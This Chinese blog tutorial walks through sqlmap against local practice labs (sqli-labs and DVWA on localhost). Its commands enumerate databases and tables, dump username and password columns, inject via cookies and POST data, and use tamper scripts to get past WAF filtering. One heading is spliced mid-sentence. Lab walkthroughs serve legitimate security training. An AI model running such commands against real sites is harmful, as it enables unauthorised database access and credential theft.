sql注入——sqlmap的基本使用

一、以sql labs1为例

1.用sql labs的地址为例,打开cmd,输入python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1

由上图我们可以看到返回的网址是mysql类型的,经过扫描可看到注入类型有以上几种

2.输入:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --dbs 可查看数据库

3.输入:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-db可查看当前的数据库

4.输入:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-user可查看当前的用户

5.输入:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security --tables  可指定查看该数据库的所有表

6.输入:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T --users --columns指定查看该数据库中的users表的所有列

7.输入:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T users -C username,password --dump可查看具体数据列的内容

二、利用sqlmap对DVWA低级别进行检测

1.选定DVWA级别是低级别

2.进入sql注入,填1,提交

3.首先需要先借助bp软件进行抓包拿到cookie值

4.将抓包拿到的cookie值复制到cmd中,输入:python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=2l919te8na88orp4t3bcshc844",检测出id是存在漏洞的

5.输入:python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=2l919te8na88orp4t3bcshc844" --current-db查看当前数据库

三、利用sqlmap对DVWA中级别进行检测(利用POST数据传参)

1.选定DVWA级别是中级别

2.在sql注入中提交数据,并用bp抓包

3.在cmd中用--data指定POST数据,同样用--cookie指定cookie数据,输入:python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=medium; PHPSESSID=2l919te8na88orp4t3bcshc844" 检测出该数据是POST数据,id存在漏洞

4.输入:python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=medium; PHPSESSID=2l919te8na88orp4t3bcshc844" --current-db查看当前数据库

四、以sql labs20为例介绍cookie注入

1.输入正确的用户名和密码登陆成功后可看到下图:

2.利用bp软件抓包获取ccookie值

3.将地址和cookie写在cmd中:python sqlmap.py -u "http://localhost/sqli-labs-master/Less-20/index.php" --cookie " uname=admin" -p uname --level 5 -v 6

1.输入正确的用户名和密码登陆成功后可看五、以sql labs21为例介绍cookie注入到下图:

2.利用bp软件抓包获取ccookie值

3.将地址和cookie写在cmd中:python sqlmap.py -u "http://localhost/sqli-labs-master/Less-21/index.php" --cookie "uname=admin" -p uname --tamper "base64encode" --level 5 --dbms mysql可看到uname的cookie

六、使用sqlmap进绕过waf机制

sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,通过自带的tamper,或者自行编写tamper(路径:安装目录sqlmap\tamper),可以帮助我们绕过waf进行自动化攻击

1.编写一个脚本

2.在cmd中输入:python sqlmap.py -u "http://localhost/sqli-labs-master/Less-25/?id=1" --tamper or2orr --dbs,得到下面的漏洞及所有的数据库

发布了38 篇原创文章 · 获赞 21 · 访问量 1944

猜你喜欢

转载自blog.csdn.net/cxrpty/article/details/104268286